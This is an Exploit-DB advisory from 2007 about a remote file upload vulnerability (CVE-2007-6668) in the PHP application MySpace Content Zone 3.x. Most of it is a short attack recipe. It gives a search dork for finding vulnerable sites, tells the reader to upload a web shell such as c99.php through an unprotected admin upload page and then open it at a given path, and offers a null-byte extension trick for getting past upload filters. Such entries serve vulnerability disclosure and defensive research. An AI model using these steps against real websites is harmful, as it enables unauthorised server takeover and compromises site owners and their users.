MySpace Content Zone 3.x - Remote File Upload Vulnerability

ID EDB-ID:4741
Type exploitdb
Reporter Don
Modified 2007-12-18T00:00:00


MySpace Content Zone 3.x Remote File Upload Vulnerability. CVE-2007-6668. Webapps exploit for php platform

[+-MySpace Content Zone RFi-+]
Found By Don & breaker_unit

Vuln file: /admin/uploadgames.php
Fix: secure admin area

Dork: "Powered by MySpace Content Zone"

go to /admin/uploadgames.php
and upload your shell - lets say it is named as c99.php

ok, now go to /uploads/thumb/c99.php

and - what you see ?? :xD
your shell!

Note1: you can add .php%00.jpeg cause %00 = null
Note2: it takes awhile to upload a shell sometimes!

Creditz to breaker_unit, and str0ke!
Don is wishing Happy Holidays to all of you reading this!

# [2007-12-18]